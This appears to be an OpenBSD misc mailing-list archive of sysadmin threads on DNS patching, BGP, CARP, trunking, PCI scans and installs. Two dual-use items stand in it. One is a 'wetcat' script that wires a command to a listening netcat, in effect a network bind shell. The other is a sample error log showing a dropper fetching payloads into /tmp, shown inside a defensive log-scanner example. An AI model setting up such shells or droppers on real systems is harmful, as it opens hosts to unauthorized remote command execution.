nothing to be worried about, no changes to any system critical files
or anything of that ilk.  Where can I look for more information or
clues?  I know the machine is due for an upgrade, and that's next on
my list.  I would provide a dmesg but the machine has been up for a
while with one full disk, so it's been pushed out of the end of the
dmesg file.

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
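Gaby's error_log excerpt shows the two things worth extracting from an Apache error log in this situation: a downloader writing into /tmp, and the shell later failing to execute what was dropped there. As an added example, not from the thread, here is a small sh/awk scanner that pulls those event types out of an error_log and counts them per path, so a grep across all virtual hosts' logs becomes a short list instead of raw wget chatter. The sample log it runs on is constructed to look like the excerpt above, with a placeholder host name.

```shell
#!/bin/sh
# Added example (not from the thread): pull downloader and exec-attempt
# events out of an httpd error_log and count them per path.

# scan_error_log FILE
# Prints "COUNT EVENT PATH" lines, most frequent first.  Events:
#   download-target  a wget-style "=> `/tmp/...'" line (fetch started)
#   download-saved   a "`/tmp/...' saved [" line (fetch completed)
#   exec-attempt     "/tmp/NAME[N]: ..." (sh tried to run a dropped file)
scan_error_log() {
    awk -v q="'" '
        # downloader started writing into /tmp or /var/tmp
        match($0, "=> `/(var/)?tmp/[^" q "]*" q) {
            print "download-target " substr($0, RSTART + 4, RLENGTH - 5)
            next
        }
        # downloader finished writing the file
        match($0, "- `/(var/)?tmp/[^" q "]*" q " saved \\[") {
            print "download-saved " substr($0, RSTART + 3, RLENGTH - 12)
            next
        }
        # a shell error message naming a script under /tmp: someone ran it
        match($0, "^/(var/)?tmp/[A-Za-z0-9._/-]*\\[[0-9]+\\]:") {
            path = substr($0, 1, RLENGTH)
            sub(/\[[0-9]+\]:$/, "", path)
            print "exec-attempt " path
            next
        }
    ' "$1" | sort | uniq -c | sort -rn
}

# Constructed sample in the shape of the error_log quoted in the thread;
# the host is a placeholder, not the one from the original log.
sample_error_log() {
    cat <<'EOF'
--05:10:47--  http://downloads.example.invalid/phpBB2/linuxday.txt
           => `/tmp/.cpanel'
Resolving downloads.example.invalid... done.
Connecting to downloads.example.invalid[192.0.2.10]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,355 [text/plain]
05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355]
--05:12:13--  http://downloads.example.invalid/phpBB2/linuxdaybot.txt
   (try: 2) => `/tmp/.cpanel.tmp'
/tmp/x44423[1]: ^?ELF^A^A^ALinux: not found
/tmp/x44423[4]: syntax error: `(' unexpected
[Wed Jan  4 05:13:00 2006] [error] [client 192.0.2.20] File does not exist: /var/www/htdocs/favicon.ico
EOF
}

log=$(mktemp) || exit 1
sample_error_log > "$log"
scan_error_log "$log"
rm -f "$log"
```

Run it over every error_log, including the default /var/www/logs/error_log that catches sites without their own ErrorLog; a download-target with no matching download-saved is still a hit, since the fetch was attempted even if it timed out.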




netcat man page: -e emulation

2006-01-06 Thread Pete Vickers

Hi,

The traditional netcat had a -e option to "Execute the specified command, using data from the network for stdin, and sending stdout and stderr to the network..."
Whilst I can understand that this option might not be desirable to be included in the binary (for security reasons ?), I occasionally find it very useful, and so emulate it with a shell script:


$ cat wetcat
#!/bin/ksh
# wetcat: emulate "nc -e CMD" by wiring the command's stdin/stdout to nc(1)
# through a FIFO.  usage: wetcat command [args...]  (listens on LISTEN_PORT)
CMD="$*"
LISTEN_PORT=1234
# private scratch directory from mktemp(1) rather than a guessable /tmp name
DIR=$(mktemp -d /tmp/wetcat.XXXXXXXXXX) || exit 1
FIFO="$DIR/fifo"
trap 'rm -rf "$DIR"' EXIT
mkfifo -m 600 "$FIFO"
# network -> FIFO -> command stdin; command stdout and stderr -> network
($CMD < "$FIFO") 2>&1 | nc -l "$LISTEN_PORT" > "$FIFO"

If others would find it useful too, maybe it could be added to the examples section of the nc(1) man page ?


/Pete



Re: Temperature

2006-01-15 Thread Pete Vickers

Hi,

While we're on this subject, what about adding something like "sysctl -w | grep hw.sensor" to /etc/daily ? I'd consider the output of such to be as useful as the status of disk space etc.


/Pete


On 15. jan. 2006, at 16.25, Stuart Henderson wrote:


On 2006/01/15 13:05, Ricardo Lucas wrote:

anyone knows a program that monitoring the cpu temperature
and hard disk temperature


sysctl(8) (hw.sensors tree) is the natural place for this information,
you can be alerted if it exceeds parameters with sensorsd(8). Sensors
for many motherboards and SCSI safte(4) enclosures are monitored here.

SMART-capable ATA drives can be monitored with atactl(8), but you will
probably need further processing to get actual temperatures.


rotation?!


hard disk rotation - don't think so.
fan rotation - hw.sensors again.




3.9beta on macppc snapshot 30-01-06: no keyboard

2006-01-31 Thread Pete Vickers

Hi,

on my powerbook5,2 (G4 15"), runs through booting fine, but at the install,upgrade,shell prompt, the keyboard doesn't work ( but still lights the LED)


dmesg is thus little tricky to acquire...

/Pete



Re: 3.9beta on macppc snapshot 30-01-06: no keyboard

2006-02-06 Thread Pete Vickers
01488 sectors
wd0(wdc1:0:0): using PIO mode 4, DMA mode 2, Ultra-DMA mode 5
"Apple UniNorth Firewire" rev 0x81 at pci2 dev 14 function 0 not configured
gem0 at pci2 dev 15 function 0 "Apple Uni-N2 GMAC" rev 0x80: irq 41, address 00:0a:95:cd:87:c4
eephy0 at gem0 phy 0: Marvell 88E Gigabit PHY, rev. 1
rd0: fixed, 8192 blocks
uhidev0 at uhub2 port 1 configuration 1 interface 0
uhidev0: vendor 0x05ac product 0x1000, rev 2.00/15.86, addr 2, iclass 3/1
ukbd0 at uhidev0
wskbd0 at ukbd0: console keyboard, using wsdisplay0
uhidev1 at uhub2 port 1 configuration 1 interface 1
uhidev1: vendor 0x05ac product 0x1000, rev 2.00/15.86, addr 2, iclass 3/1
uhid0 at uhidev1: input=3, output=0, feature=1
bootpath: '/[EMAIL PROTECTED]/[EMAIL PROTECTED]/[EMAIL PROTECTED]/[EMAIL PROTECTED]/3.9/macppc/bsd.rd'
rootdev=0x1100 rrootdev=0x1100 rawdev=0x1102
WARNING: clock gained 6 days -- CHECK AND RESET THE DATE!
uhidev2 at uhub4 port 1 configuration 1 interface 0
uhidev2: Chicony USB Keyboard, rev 1.10/1.00, addr 2, iclass 3/1
ukbd1 at uhidev2
wskbd1 at ukbd1 mux 1
wskbd1: connecting to wsdisplay0
uhidev3 at uhub4 port 1 configuration 1 interface 1
uhidev3: Chicony USB Keyboard, rev 1.10/1.00, addr 2, iclass 3/1
uhid1 at uhidev3: input=4, output=0, feature=0
ural0 at uhub5 port 1
ural0: Ralink 802.11g WLAN + Pen Drive, rev 2.00/0.01, addr 2
ural0: MAC/BBP RT2570 (rev 0x03), RF RT2526, address 00:0f:ea:61:5b:70


I'm willing to test kernels, but 'able' is questionable: currently whole HDD is HFS+ , so whilst .iso's are easiest to test, I'll try & do an install onto a USB disk to test kernels if necessary.


/Pete


On 6. feb. 2006, at 22.55, Miod Vallat wrote:


on my powerbook5,2 (G4 15"), runs through booting fine, but at the
install,upgrade,shell prompt, the keyboard doesn't work ( but 
still lights the LED)


Can you try the latest snapshot (January 30th)? If the built-in keyboard
still fails to work, can you plug an external USB keyboard to get the
dmesg? And are you willing to test kernels if the problem still arises?


Miod




OpenBGPD dropping sessions.

2006-02-17 Thread Pete Bristow
Hi
I've got OpenBGPD running on 3.7, currently whenever I bring up a
session with another peer the session drops to Idle as soon as a set of
routes are learnt.

#macros
BD01="217.112.a.b"

AS 64513

router-id 85.234.132.65
neighbor $BD01 {
  remote-as 29550
  descr BD01
  multihop 3
  local-address 85.234.132.65
  announce none
}

deny from any prefix 10.0.0.0/8 prefixlen >= 8
deny from any prefix 172.16.0.0/12 prefixlen >= 12
deny from any prefix 192.168.0.0/16 prefixlen >= 16
deny from any prefix 169.254.0.0/16 prefixlen >= 16
deny from any prefix 192.0.2.0/24 prefixlen >= 24
deny from any prefix 224.0.0.0/4 prefixlen >= 4
deny from any prefix 240.0.0.0/4 prefixlen >= 4

The routes in particular are
Destination          Peer            Next-Hop        MED ASPATH
*i84.92.0.0  /15 195.66.224.164  195.66.224.164  90 6871
*i212.159.64.0   /18 195.66.224.164  195.66.224.164  90 6871
*i87.115.0.0 /16 195.66.224.164  195.66.224.164  90 6871
*i195.7.224.0/19 195.66.224.164  195.66.224.164   0 6871 8622 8622
*i87.114.0.0 /16 195.66.224.164  195.66.224.164  90 6871
*i87.113.0.0 /16 195.66.224.164  195.66.224.164  90 6871
*i87.112.0.0 /16 195.66.224.164  195.66.224.164  90 6871
*i212.159.0.0/19 195.66.224.164  195.66.224.164  90 6871
*i212.159.32.0   /19 195.66.224.164  195.66.224.164  90 6871
*i81.174.128.0   /17 195.66.224.164  195.66.224.164  90 6871
*i212.56.64.0/18 195.66.224.164  195.66.224.164  90 6871
*i80.229.0.0 /16 195.66.224.164  195.66.224.164  90 6871
*i212.84.96.0/19 195.66.224.164  195.66.224.164  0 6871 8622 8622
*i195.166.128.0  /19 195.66.224.164  195.66.224.164  90 6871

This behaviour has been observed when bringing sessions up against other
routers too. Is there a way of getting bgpd to log more information as
to why the session was torn down, rather than just logging state
changes. I would speak to AS6871 about the problem but as yet I haven't
worked out what's going wrong.

I tried logging everything with
log updates
dump all in "/var/log/bgp.log"

However when I look at the log with route_btoa it reveals nothing of
what brought down the session.

If I have left out anything pertinent beat me with a clue stick.

Thanks for any help you guys can give me.

Pete



Re: OpenBGPD dropping sessions.

2006-02-17 Thread Pete Bristow
Hi Henning

> * Pete Bristow <[EMAIL PROTECTED]> [2006-02-17 12:30]:
> 
>>I've got OpenBGPD running on 3.7, currently whenever I bring up a
>>session with another peer the session drops to Idle as soon as a set of
>>routes are learnt.
> 
> 
> that, of course, is not normal behaviour and nothing we ever observed...
> 
> 
>>This behaviour has been observed when bringing sessions up against other
>>routers too. Is there a way of getting bgpd to log more information as
>>to why the session was torn down, rather than just logging state
>>changes. I would speak to AS6871 about the problem but as yet I haven't
>>worked out what's going wrong.
> 
> 
> please show the logs. bgpd does log why a sessions drops back to IDLE.
> 

Feb 17 12:15:54 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change
Idle -> Connect, reason: Start
Feb 17 12:15:54 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change
Connect -> OpenSent, reason: Connection opened
Feb 17 12:15:54 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change
OpenSent -> OpenConfirm, reason: OPEN message received
Feb 17 12:15:54 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change
OpenConfirm -> Established, reason: KEEPALIVE message received
Feb 17 12:16:05 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change
Established -> Idle, reason: Connection closed

Was all I got.

Pete



Re: Problem with squirrelmail

2006-03-02 Thread Pete Vickers

On 2. mar. 2006, at 14.00, Alexander Bochmann wrote:

...on Thu, Mar 02, 2006 at 01:07:09PM +0200, Gabriel George POPA  
wrote:


   I have a small problem with squirrelmail. The problem is that users
cannot read their mail messages if they are too large (though not very

 [..]

going on? Settings from /etc/inetd.conf:
# IMAP server from PINE
imap2   stream  tcp     nowait  root    /usr/sbin/imapd imapd


That doesn't really explain your problem, but if you
are running an imapd from inetd and have enough users,
you will certainly run into the default spawn limit
of 256 connections in 60 seconds.

Try cranking that up to a sensible number for your
environment (nowait.2048 or something).

Alex.



php has some system limits in php.ini , maybe you're hitting one of them ? any clues in your php_error log ?


BTW, if you're only running imap for the benefit of locally hosted squirrelmail, then you can use an inetd.conf line like:

127.0.0.1:imap  stream  tcp     nowait  root    /usr/local/libexec/imapd        imapd

for increased security.

/Pete



Re: using openbsd on zaurus

2006-03-15 Thread Pete Vickers

On 12. mar. 2006, at 13.37, Theo de Raadt wrote:


I'm planning to buy a zaurus sl-c3200 (the latest zaurus 3xxx model).


Please note that you would be the first person.  None of us have the
C3200 yet.


I had a look at the latest zaurus snapshot directories (on
ftp.openbsd.org) and saw that the choice of available pre-build
packages is highly reduced compared to i386.


Most stuff compiles.  Much has not been tested, though


Is it possible to compile and install any applications of the ports
tree on a zaurus (for example firefox, thunderbird ...)?


Those two are pretty unreasonable on the Zaurus.  It isn't that fast,
and it is somewhat lacking in memory.  There is some work on minimo,
but it isn't completely reliable yet.


Does the ports tree system work as well on a zaurus as on the i386
platforms or may I encounter severe build problems?


As I said above, it is pretty good.  But you have to be reasonable
about how fast and capable a Zaurus is.



Hi,

For faster cpu, and many built-in goodies, I believe a similar cpu (intel pxa270) is also used in the Qtek 9000 PDA:
http://www.qtekcorp.com/products.aspx?Level1=1&Menu1=0&Model=22&Submenu=2


including:
Intel XScale @ 520Mhz
640x480x65k touchscreen and QWERTY keyboard
GSM/GPRS/UMTS radio; 802.11b radio;
64MB RAM (128MB ROM) + SDIO/MMC card for decent flash disk.
mini-USB, IRDA, bluetooth.
2x loudspeakers/headphone, 1.3Mp camera.



obviously I'm aware cpu != machine etc etc.

I guess it would just be a case of buy 3 ( one for me, and 2 for obsd devs) and hope that sufficient documentation would prevail...


/Pete



recent CARP 'fixes'

2006-03-21 Thread Pete Vickers

Hi,

I have a pair of openbsd amd64 3.8+ boxes with a few shared carp interfaces. They were playing perfectly together until today. I upgraded one to the 20-03-06 snapshot ( the other is still at circa. 18-12-2005). Now both the boxes claim to be carp MASTERs, with obvious consequences.


net.inet.carp.log=1 or tcpdump don't show any problems though.

/plus39.html lists 2 carp fixes. The first relates to HMAC calc, so I disabled the carp password, without any effect. The other fix relates to a 'short' incorrect MASTER status at boot - whereas mine seems to persist indefinitely.


Is this an incompatibility between o/s versions, or just a passing -current hiccup ?



/Pete


[EMAIL PROTECTED] /root> cat /var/run/dmesg.boot
OpenBSD 3.9-current (GENERIC.MP) #750: Sun Mar 19 18:25:28 MST 2006
[EMAIL PROTECTED]:/usr/src/sys/arch/amd64/compile/GENERIC.MP
real mem = 2146140160 (2095840K)
avail mem = 1834962944 (1791956K)
using 22937 buffers containing 214822912 bytes (209788K) of memory
mainbus0 (root)
ipmi0 at mainbus0: version 1.5 interface KCS iobase 0xca2/2 spacing 1
mainbus0: scanning 0x98800 to 0x98bf0 for MP signature
mainbus0: scanning 0x98400 to 0x987f0 for MP signature
mainbus0: scanning 0xf to 0x0 for MP signature
mainbus0: MP floating pointer found in bios at 0xf72f0
mainbus0: MP config table at 0x9bb20, 372 bytes long
mainbus0: Intel MP Specification (Version 1.4) (AMD  HAMMER  )
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: AMD Opteron(tm) Processor 252, 2612.34 MHz
cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,NXE,MMXX,FFXSR,LONG,3DNOW2,3DNOW
cpu0: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 1MB 64b/line 16-way L2 cache
cpu0: ITLB 32 4KB entries fully associative, 8 4MB entries fully associative
cpu0: DTLB 32 4KB entries fully associative, 8 4MB entries fully associative
cpu0: calibrating local timer
cpu0: apic clock running at 200MHz
cpu0: kstack at 0x800067d66000 for 20480 bytes
cpu0: idle pcb at 0x800067d66000, idle sp at 0x800067d6aff0
cpu1 at mainbus0: apid 1 (application processor)
cpu1: AMD Opteron(tm) Processor 252, 2612.04 MHz
cpu1: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,NXE,MMXX,FFXSR,LONG,3DNOW2,3DNOW
cpu1: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 1MB 64b/line 16-way L2 cache
cpu1: ITLB 32 4KB entries fully associative, 8 4MB entries fully associative
cpu1: DTLB 32 4KB entries fully associative, 8 4MB entries fully associative
cpu1: kstack at 0x800067d6b000 for 20480 bytes
cpu1: idle pcb at 0x800067d6b000, idle sp at 0x800067d6fff0
mpbios: bus 0 is type PCI
mpbios: bus 1 is type PCI
mpbios: bus 2 is type PCI
mpbios: bus 3 is type PCI
mpbios: bus 4 is type PCI
mpbios: bus 128 is type PCI
mpbios: bus 129 is type PCI
mpbios: bus 134 is type PCI
mpbios: bus 139 is type ISA
ioapic0 at mainbus0 apid 2 pa 0xfec0, virtual wire mode, version 11, 24 pins
ioapic1 at mainbus0 apid 3 pa 0xd800, virtual wire mode, version 11, 7 pins
ioapic2 at mainbus0 apid 4 pa 0xd8001000, virtual wire mode, version 11, 7 pins
ioapic0: int0 attached to ExtINT (type 0x3 flags 0x5)
ioapic0: int1 attached to isa0 irq 1 (type 0x0 flags 0x5)
ioapic0: int2 attached to isa0 irq 2 (type 0x0 flags 0x5)
ioapic0: int3 attached to isa0 irq 3 (type 0x0 flags 0x5)
ioapic0: int4 attached to isa0 irq 4 (type 0x0 flags 0x5)
ioapic0: int5 attached to isa0 irq 5 (type 0x0 flags 0x5)
ioapic0: int6 attached to isa0 irq 6 (type 0x0 flags 0x5)
ioapic0: int7 attached to isa0 irq 7 (type 0x0 flags 0x5)
ioapic0: int8 attached to isa0 irq 8 (type 0x0 flags 0x5)
ioapic0: int9 attached to isa0 irq 9 (type 0x0 flags 0x5)
ioapic0: int10 attached to isa0 irq 10 (type 0x0 flags 0xf)
ioapic0: int11 attached to isa0 irq 11 (type 0x0 flags 0xf)
ioapic0: int12 attached to isa0 irq 12 (type 0x0 flags 0x5)
ioapic0: int13 attached to isa0 irq 13 (type 0x0 flags 0x5)
ioapic0: int14 attached to isa0 irq 14 (type 0x0 flags 0x5)
ioapic0: int15 attached to isa0 irq 15 (type 0x0 flags 0x5)
ioapic0: int10 attached to pci0 device 2 INT_A (type 0x0 flags 0xf)
ioapic0: int11 attached to pci0 device 2 INT_B (type 0x0 flags 0xf)
ioapic0: int10 attached to pci0 device 8 INT_A (type 0x0 flags 0xf)
ioapic0: int11 attached to pci1 device 5 INT_A (type 0x0 flags 0xf)
ioapic0: int11 attached to pci2 device 0 INT_A (type 0x0 flags 0xf)
ioapic0: int10 attached to pci3 device 0 INT_A (type 0x0 flags 0xf)
local apic: int0 attached to ExtINT (type 0x3 flags 0x5)
local apic: int1 attached to NMI (type 0x1 flags 0x5)
mainbus0: MP WARNING: 160 bytes of extended entries not examined
pci0 at mainbus0 bus 0: configuration mode 1
"NVIDIA nForce4 DDR" rev 0xa3 at pci0 dev 0 function 0 not configured
pcib0 at pci0 dev 1 function 0 "NVIDIA nForce4 ISA" rev 0xa3
nviic0 at pci0 dev 1 function 1 &

Re: OT: App to get detailed http measurements

2008-06-14 Thread Pete Vickers

I've had good results with SIEGE

http://www.joedog.org/

/Pete




On 14 Jun 2008, at 12:55, Mikolaj Kucharski wrote:


Hi,

This is off topic, but does anyone know a (preferably command-line) utility
with which I could test an HTTP server? What interests me is repeated
connections and stats on how long it took to resolve DNS, TCP connect, send
the request and finally download the data.

Really appreciate any tips. Thanks.

--
best regards
q#




Re: pass pasword to ssh

2008-06-19 Thread Pete Vickers

perhaps you could write your script in perl ?

http://www.openbsd.org/4.3_packages/i386/p5-Net-SSH-Perl-1.30.tgz-long.html

/Pete


On 19 Jun 2008, at 16:31, Stuart Henderson wrote:


On 2008-06-19, Richard Storm <[EMAIL PROTECTED]> wrote:
I am writing a script that would ssh to a switch and dump the configuration to a file.


1) Since it is a switch, I have no way to make use of public key
authentication, because I have no way to store a pubkey on the switch.


Which switch? On my HP switches I can just sftp the public
keys in (and fetch the config back out the same way...)


What is the cleanest way to pass password to ssh?


Not sure about "cleanest", but expect (in packages/ports) works ok.
You can generate a script with "autoexpect" and manually edit it.




Re: OpenBSD project goals

2008-06-24 Thread Pete Vickers

nah, real men wrote a program to write their thesis for them ;-)

/Pete



On 24 Jun 2008, at 22:29, Martin Schröder wrote:


2008/6/24 Pierre Riteau <[EMAIL PROTECTED]>:

As someone already said earlier, you can write your letter in troff
with mg or vi and create a postscript file from that.


Real Men wrote their thesis directly in PostScript using ed. :-)

Best
  Martin




DNS patch

2008-07-08 Thread Pete Vickers

Does this mean we should expect one soon ?


http://securosis.com/publications/CERT%20Advisory.doc


/Pete



Re: Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable to cache poisoning

2008-07-10 Thread Pete Vickers
looks like there is some work in progress to update the in-tree BIND to 9.4.2-P1 + local tweaking, for example:


http://www.openbsd.org/cgi-bin/cvsweb/src/usr.sbin/bind/lib/dns/dispatch.c?r1=1.8

As Theo points out, patience is a virtue, and it's the "+ local tweaking" above that is the reason I gratefully use OpenBSD.



/Pete




On 9 Jul 2008, at 16:45, Zamri Besar wrote:


Good morning,

Today, I received an alert from one of my friends regarding
Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable
to cache poisoning.
http://www.kb.cert.org/vuls/id/800113

I checked the above site, and found that most of the *BSD statuses are
unknown. Does this bug affect OpenBSD's default bind dns?

I don't know whether the above bug is similar to this thread or not.
http://marc.info/?l=openbsd-misc&m=118539211412877&w=2

--
Thank you.

Yours truly,

Zamri Besar




Re: eeepc via usb pen

2008-07-23 Thread Pete Vickers

1. enable netboot in eee's BIOS settings
2. man 8 pxeboot

/Pete
On 23 Jul 2008, at 16:33, [EMAIL PROTECTED] wrote:


Hi
Sorry for the noise but I am trying to install openbsd on an eeepc via a usb pen. I have managed to install 4.(1 or 2) in the past but do not seem to be able to get the 4.3 install to boot off a pen. I know I could (hopefully) un-tar the files from the install4.3.iso mounted with loopback on another *nix and copy the fs then configure everything and dd the mbr (or something like that); the closest I have got is a kernel panic saying boot too old upgrade when I try to boot bsd.rd via grub. But is there an easier way (without buying a usb cdrom) to boot the usb pen as an install source?





Re: Is it necessary to recompile OS to apply security patch?

2008-07-29 Thread Pete Vickers

Hi,

Assuming the box is only a DNS server, then the simplest & easiest (in my opinion) is to take a copy of the DNS related files:
- /etc/rc.conf.local
- /var/named/*
- noting also IP address, hostname etc etc

and then reinstall the o/s from a recent snapshot (downloaded here ftp://ftp.openbsd.org/pub/OpenBSD/snapshots/ or a mirror), which has all the patches pre-applied. Then restore the above files. Job done.

If you're paranoid and inexperienced in unix, then grab a spare machine to do a dry run on that.

/Pete



On 29 Jul 2008, at 18:16, skogzort wrote:


Hello,
I know nothing/very little about OpenBSD or UNIX. I have been tasked with updating our OpenBSD DNS server with a security fix (Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable to cache poisoning).

In order to do this it appears that I have to download the source code and re-compile the entire OS. Recompiling the OS seems to involve a lot of steps. Before I continue to read through them all, I just want to confirm that it is actually necessary to do all of this, simply to apply a security patch:

Download the tree..
Pre load the tree..
Build the Kernel..
Build the userland..
Etc.

The only thing we use the server for is DNS. I don't know what flavor we are running, since it's on a production server I assume it will be *release or *stable, either way from what I've read so far it looks like in order to apply this security patch I will have to update it to *stable, which seems to require that the entire OS be recompiled. Is this correct?

Is it true that the only way to apply this patch is to recompile the entire OS, and go through all the steps above? I don't mind doing all this since it will give me a chance to learn, it's just that the more steps I have to take, the more chances there are for mistakes. I want to be sure that the way I plan to do the update is the simplest. I'm only familiar with Windows, where you just push a button to apply a security patch and you don't even have to reboot the server, so I was thinking that I may be misunderstanding what I'm reading.

Thanks very much for your time and any info

Kyle




nagios check_via_ssh on (chroot) OpenBSD

2008-09-12 Thread Pete Vickers

Does anyone have it running in nagios chroot environment ?

[EMAIL PROTECTED] /> ldd /usr/local/libexec/nagios/check_by_ssh
/usr/local/libexec/nagios/check_by_ssh:
Start    End      Type Open Ref GrpRef Name
                  exe  1    0   0      /usr/local/libexec/nagios/check_by_ssh
052b6000 252ba000 rlib 0    1   0      /usr/local/lib/libintl.so.4.0
0e276000 2e352000 rlib 0    1   0      /usr/local/lib/libiconv.so.4.0
0e739000 2e76d000 rlib 0    1   0      /usr/lib/libc.so.43.0
0fc4     0fc4     rtld 0    1   0      /usr/libexec/ld.so


perhaps like the ssh libraries are not needed, but where should the ssh keys be put ?


[EMAIL PROTECTED] />grep nagios /etc/passwd
_nagios:*:550:550:Nagios user:/var/www/nagios:/sbin/nologin

in /var/www/nagios/.ssh/ ?

TiA,


Pete Vickers

[EMAIL PROTECTED] |  +47 48 17 91 00

SystemNet AS



Re: Using trunk(4) to put a router in a switch ring

2008-09-23 Thread Pete Vickers

1.  create a layer 2 (switched) ring, using spanning tree.
- completely independent of openbsd box

2.  connect your (dual NIC) openbsd box to 2 separate switches for redundancy, and add both NICs to a trunk group.

- redundancy of switch, cabling and NICs.



[EMAIL PROTECTED] ~>ifconfig bge0
bge0: flags=8943 mtu 1500
	lladdr 00:18:fe:32:1e:08
	trunk: trunkdev trunk0
	media: Ethernet autoselect (1000baseT full-duplex)
	status: active


[EMAIL PROTECTED] ~>ifconfig bge1
bge1: flags=8943 mtu 1500
	lladdr 00:18:fe:32:1e:08
	trunk: trunkdev trunk0
	media: Ethernet autoselect (1000baseT full-duplex)
	status: active


[EMAIL PROTECTED] ~>ifconfig trunk0
trunk0: flags=8843 mtu 1500
	lladdr 00:18:fe:32:1e:08
	trunk: trunkproto failover
		trunkport bge1 active
		trunkport bge0 master,active
	groups: trunk egress
	media: Ethernet autoselect
	status: active
	inet 1.2.3.4 netmask 0xff00 broadcast 255.255.255.0


been using it for years:
[EMAIL PROTECTED] ~>uname -a
OpenBSD tug 4.0 GENERIC#1107 i386

/Pete



On 22 Sep 2008, at 22:03, Stuart Henderson wrote:


On 2008-09-22, Dave Wilson <[EMAIL PROTECTED]> wrote:

I'm not sure if trunk or bridge are more appropriate in this case


I think probably bridge with RSTP, but I'm not sure how that will
play with vlans (if you use them).

I'd like to do something similar, but I have vlans, and as an
added twist my interconnects are over third-party vlans, and I'm
not especially keen on breaking the third party's switch fabric,
so I haven't risked experimenting much with this yet :)




Re: Using trunk(4) to put a router in a switch ring

2008-09-24 Thread Pete Vickers
well i think you could insert your dual NIC openbsd host into the switch 'ring' physically, then bridging between the 2 NICs and firing up STP, but be aware that every time you up/down an interface or reboot your openbsd box, you'll trigger an STP recalc - which is around 45sec outage across entire switch infrastructure. (This can be mitigated with PVST and RSTP somewhat).



/Pete



On 23 Sep 2008, at 14:51, Dave Wilson wrote:


Pete Vickers wrote:

1.  create a layer 2 (switched) ring, using spanning tree.
- completely independent of openbsd box

2. connect your (dual NIC) openbsd box to 2 separate switches for
redundancy, and add both NICs to a trunk group.
- redundancy of switch, cabling and NICs.



Pete,

thanks for your useful and informative reply. A decent example is worth a paragraph of explanation to me :-)


Whilst I would love to do as you suggest, unfortunately my switches only have 2 GbE ports each. My hope was to put the routers in the GbE ring, as otherwise my routers will be bottlenecked by plugging into 100M ports on the switches. As most of my traffic goes through the routers this would be a big issue.


I suspect the only way I will really nail down what I can and cannot do will be to get some new switches and build a router and start playing around. The thing that I think is most likely to break is that I already use vlans and carp, and so I will have to work out the proper way to layer physical, bridge, vlan and carp whilst still making sure that packets keep going round the ring.


Unless reyk@, porter of the rstp code for bridge, can tell me different...?


SD




Re: Unified BSD?

2012-11-12 Thread pete wright
On Mon, Nov 12, 2012 at 12:37 PM, Robin Björklin wrote:

>
>
> Am I bat crap crazy for thinking it could be good to merge the four largest
> BSD variants out there, take the best bits and pieces out of each and
> create a Unified BSD?
>

you are not crazy for thinking this, and fortunately there is nothing
prohibiting you from doing so (or a collective group of people, or
company etc...).  One thing you will see in the BSD Unix systems is
there is quite a bit of cross pollination between projects.  The
largest example current example of this from my perspective is support
for OpenBSD's "pf" packet filter in FreeBSD.  This is a packet filter
built to suit the OpenBSD developers goals, but it did not restrict
FreeBSD from supporting this packet filter and hopefully both projects
benefit from this collaboration (wider code exposure of the pf code,
and wider choice of packet filters for FreeBSD users).

My opinion is that with the current state of the BSD's this is one of
its stronger suits - we have multiple projects right now building
entire operating systems to suit each of the projects stated goals and
developer wishes.  this would be opposed to gnu/linux where you are
cobbling together many disparate sources to build your distribution
(some of which will have goals that may not line up with your goals).
with this diversity we still cross pollinate ideas and methods, but
are still allowed to spend our limited resources focusing on our
projects core goals.

-pete

-- 
pete wright
www.nycbug.org
@nomadlogicLA



Re: Ramifications of blocking SYN+FIN TCP packets

2009-03-12 Thread Pete Vickers

Hi,

What about Postel's 'be liberal in what you accept' ?  What about peers/intermediate systems that have for example bugs which accidentally set FIN flags (ISP's broken traffic shaping/limiting device anyone ?).  If pf can safely cleanse such legitimate traffic, then why block it ?


Blindly implementing 'orders' from PCI etc is just wrong - to do so is only encouraging such bad practices. Instead reject their demands, using whatever appeals process is available. Only when enough technical staff do so will it be fixed.


All such regulations should be of the style where both of these are permitted:

- "I am a stupid admin, so I'll just blindly follow them"
and
- "I am a competent admin, so I'll use my judgement to best protect my net"



How about this, for a fun response:  "We don't want to drop such 'special' traffic, since if we do so, then an attacker can deduce that we have implemented PCI guidelines, which in turn implies we have CC details online, and thus are a more attractive target" ...





/Pete




On 12 Mar 2009, at 10:22, J.C. Roberts wrote:


On Wed, 11 Mar 2009 13:07:22 -0400 Jason Dixon wrote:


On Wed, Mar 11, 2009 at 01:04:34PM -0400, David Goldsmith wrote:


Jason Dixon wrote:


S/SAFR

I just had to deal with this on our customer's PCI scan.  Don't
argue with the logic, just do it.  :)


Let me guess -- TrustKeeper?  We just had to deal with this as well.
Submit an appeal and they should accept it.


Yup.


The "flags S/SAFR" will work unless you are being a good little pf
admin and also scrubbing all the traffic.  The problem is pf
considers SYN-RST packets to be illegal and drops them (good) but
only considers SYN-FIN packets to be ambiguous and so it
"normalizes" them and clears the FIN bit (in this case for the PCI
scan - bad) Then your server behind the firewall received what it
thinks is a nice clean SYN packet and it sends back SYN-ACK.


Yes, we have our own reasons not to scrub there.  Well, *someone* has
their reasons.  I have to deal with those reasons.  ;)



Ahhh my least favorite acronym name space conflict:

PCI == Payment Card Industry

